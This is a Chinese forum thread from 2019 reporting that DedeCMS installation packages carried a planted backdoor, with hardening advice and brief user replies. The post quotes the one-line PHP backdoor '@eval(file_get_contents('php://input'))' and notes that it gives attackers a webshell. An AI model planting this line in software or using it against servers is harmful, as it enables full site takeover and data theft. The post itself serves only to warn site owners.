查看: 1457|回复: 5

织梦CMS建站系统被曝漏洞 几十万网站沦为木马网站

[复制链接]

27

主题

98

帖子

298

积分

中级会员

Rank: 3Rank: 3

积分
298
发表于 2019-8-2 20:51:00 | 显示全部楼层 |阅读模式
最新消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。
NMRb8AjBAHJ99iSk.jpg



据第三方权威统计数据显示,目前约有 50 万网站使用该dedecms系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。
安全界人士分析发现,此类文件被植入一句后门代码“@eval (file_get_contents ('php://input'));”,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的 WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。
下面小熊优化的小编给出一个相关建议:
1、尽快转换系统,可以使用pageadmin、动易、wp这类保持续更新的cms系统、国内一些老牌的cms包括dedecms,phpcms、jtbc等已停止更新了,建议不要使用了。
2、尽量不要网上下载不知名的插件,尤其使用wp的网站,大多被黑的都是网上乱用插件导致的。
3、保持系统更新,官方更新的版本及时更新上,不要感觉现在功能够用了就不更新,有时候更新不仅仅是功能更新,也是安全上的更新。




上一篇:一方、二方、三方、四方支付?傻傻分不清楚
下一篇:80%的创业公司都活不过三年,75%的企业转型失败

18

主题

84

帖子

285

积分

中级会员

Rank: 3Rank: 3

积分
285
发表于 2019-8-2 19:56:41 | 显示全部楼层
7年前的老漏洞了,在,include/shopcar.class.php里
回复 支持 反对

使用道具 举报

25

主题

107

帖子

331

积分

中级会员

Rank: 3Rank: 3

积分
331
发表于 2019-8-2 20:11:59 | 显示全部楼层
感觉还是织梦好用,这个漏洞怎么补!
回复 支持 反对

使用道具 举报

26

主题

103

帖子

324

积分

中级会员

Rank: 3Rank: 3

积分
324
发表于 2019-8-2 20:26:15 | 显示全部楼层
虽然用的是自己的程序。我发现了。最近一年内的漏洞攻击非常疯狂。
回复 支持 反对

使用道具 举报

28

主题

94

帖子

291

积分

中级会员

Rank: 3Rank: 3

积分
291
发表于 2019-8-2 20:41:35 | 显示全部楼层
织梦有漏洞又不是现在的事,早在好多年前就有漏洞了,一直修复
回复 支持 反对

使用道具 举报

30

主题

104

帖子

328

积分

中级会员

Rank: 3Rank: 3

积分
328
发表于 2019-8-2 20:56:09 | 显示全部楼层
你以为推荐的这些就没有漏洞吗?
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站内会员言论和发布内容仅代表个人观点, 并不代表本站同意或支持其观点, 本站不承担由此引起的法律责任,如侵犯版权请与我们联系处理